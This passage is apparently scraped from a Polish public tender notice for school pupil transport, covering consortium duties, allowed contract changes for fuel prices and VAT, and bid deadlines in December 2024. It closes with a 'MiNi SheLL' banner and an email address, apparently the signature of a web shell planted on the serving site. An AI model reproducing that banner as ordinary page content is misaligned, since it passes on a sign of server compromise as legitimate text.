zamówienie. Oświadczenie to ma potwierdzać<br/>spełnienie warunków udziału w postępowaniu, brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców<br/>wykazuje spełnienie warunków udziału w postępowaniu.<br/>2. Dokumenty składane przez członków konsorcjum, w tym oświadczenia muszą być podpisane przez wyznaczonego<br/>pełnomocnika lub osobę upoważnioną do reprezentowania danego podmiotu.<br/>3. Zamawiający w toku prowadzonego postępowania będzie przesyłał wszelką korespondencję do pełnomocnika<br/>wykonawców występujących wspólnie.<br/>4. Przepisy dotyczące pojedynczego Wykonawcy mają zastosowanie do pełnomocnika, ze skutkiem prawnym wobec<br/>wszystkich Wykonawców występujących wspólnie.<br/>5. Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający wspólną ofertę będą mieli<br/>obowiązek przedstawić Zamawiającemu umowę konsorcjum,<br/>regulującą współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian w zawartej umowie z wykonawcą. Zmiany będą możliwe w przypadku gdy<br/>konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia<br/>umowy pod warunkiem, że zmiany te są korzystne dla Zamawiającego.<br/>2. W przypadku zwiększenia ilości dowożonych uczniów, Wykonawca musi zapewnić ich dowóz na warunkach podanych w<br/>ofercie.<br/>3. Z tytułu zmniejszenia ilości dowożonych uczniów poniżej stanu z pierwszego miesiąca realizacji umowy Zamawiający nie<br/>przewiduje ponoszenia dodatkowych opłat.<br/>4. Zamawiający przewiduje możliwość zmiany umowy z Wykonawca w sytuacji:<br/>a) Zmian cen paliwa. Zmiana wynagrodzenia może zostać dokonana w przypadku, gdy w okresie wykonywania usługi,<br/>wzrost ceny paliwa przekroczy 10% w stosunku do ceny obowiązującej w dacie terminu składania ofert. Ustalenie wzrostu<br/>ceny paliwa będzie następowało na podstawie cenników publikowanych na stronach producentów paliw np. Orlen, Lotos –<br/>po ich uśrednieniu (cenniki obowiązujące na dzień składania zamówienia, Wzrost wynagrodzenia następuje na podstawie<br/>wniosku Wykonawcy, do którego powinna być dołączona kalkulacja wzrostu ceny wraz z dowodami, które tę okoliczność<br/>potwierdzają. Maksymalny poziom wzrostu ceny za bilet nie może przekroczyć 20 % w stosunku do pierwotnej ceny biletu<br/>określonej w umowie.<br/>b) Zmiany stawki VAT w okresie obowiązywania Umowy<br/>5. . Zamawiający zastrzega sobie prawo do :<br/>1) zmiany godzin, ilości kursów oraz trasy przywozów i odwozów w okresie realizacji niniejszego zamówienia,<br/>2) możliwości wprowadzenia na określone dni innego niż ustalony rozkład jazdy po wcześniejszym powiadomieniu<br/>Wykonawcy.<br/>6. Wszelkie zmiany postanowień umowy mogą być wykonywane wyłącznie w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://krzynowlogamala.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-02 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com